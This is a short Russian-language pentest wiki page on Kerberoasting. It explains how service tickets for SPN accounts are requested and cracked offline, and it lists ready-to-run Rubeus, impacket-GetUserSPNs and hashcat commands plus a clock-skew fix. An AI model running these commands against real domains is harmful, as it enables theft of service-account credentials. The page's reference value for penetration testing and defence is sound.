KERBEROASTING

Условие для проведения атаки:

Учетная запись в домене с присвоенный SPN атрибутом.

Атакующий отправляет KRB_TGS_REQ сообщения с указанием SPN, ассоциированными с выявленными учетными записями. Контроллер домена не занимается авторизацией, то есть не проверяет имеет ли скомпрометированная учетная запись право доступа к запрашиваемым сервисам, (так как для выдачи TGS пользователю достаточно предоставить свой TGT) поэтому в ответ отправляются сообщения, содержащие TGS билеты, зашифрованные с использованием секретов сервисов. Таким образом, получив TGS-билеты, атакующий может попробовать подобрать пароль к сервисам по словарю оффлайн.

Abuse

Rubeus.exe kerberoast /stats

Ldap request to search for accounts that have SPN.

"(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"

Get users with SPN and send TGS-REQ

impacket-GetUserSPNs -dc-ip $DC_IP $Domain_FQDN/$username:$password -request -outputfile $file

Brute

hashcat -m 13100 $kerberos_hashes $dictionary

Fix errors

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Если ntpdate или rdate не работают:

TIME=$(ldapsearch -x -H ldap://dc.0x0security.local -s base -b "" currentTime | awk '/currentTime/ {print $2}' | grep -v "requesting:" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/') ; PARSED=$(date -u -d "${TIME}" +"%Y-%m-%d %H:%M:%S");  sudo date -u -s "${PARSED}"

PreviousAS-REP Roasting NextAS-REQ Roasting

Last updated 7 months ago